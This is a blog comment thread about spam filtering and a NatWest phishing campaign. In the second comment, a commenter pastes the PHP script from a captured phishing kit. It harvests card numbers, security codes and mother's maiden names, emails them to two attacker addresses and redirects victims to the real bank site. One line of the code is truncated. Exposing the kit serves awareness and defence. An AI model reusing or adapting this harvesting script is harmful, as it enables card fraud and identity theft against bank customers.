Comments

Misconfigured or useless spam filter — 2 Comments

  1. We got exactly 1 of these. It was rejected because we don’t accept emails from @test.com (or @amzon.com, @security.com, and loads of other made up bullcrap domains)

  2. We also got lots of other Natwest phishing allegedly from mit.edu but client hosts in Greece. Looks like the w4nker who used to hack USA and Canadian universities is diversifyingg. Only problem for them is I managed to download the source file (nattyimg.zip) *again* and same email addresses in it.
    WaL0eHWlog0n.php

    <?
    $ip = getenv("REMOTE_ADDR");
    $message .= "Mother's Maiden Name: ".$_POST['mmmn']."n";
    $message .= "Card Number: ".$_POST['cnm']."n";
    $message .= "Expiry Date (mm/yyyy) : ".$_POST['dob0month']."/".$_POST['d
    $message .= "Security Code: ".$_POST['cst']."n";
    $message .= "IP: ".$ip."n";
    $send = "wu55albert@gmail.com,d0lphinyeung@163.com";
    $subject = "~ Natty ~ $ip";
    $headers = "From: Psylogs”;
    $headers .= $_POST[‘eMailAdd’].”n”;
    $headers .= “MIME-Version: 1.0n”;
    mail(“$send”, “$subject”, $message, $headers);
    header(“Location: http://personal.natwest.com/personal/logout.html“);

    ?>

Leave a Reply

Your email address will not be published. Required fields are marked *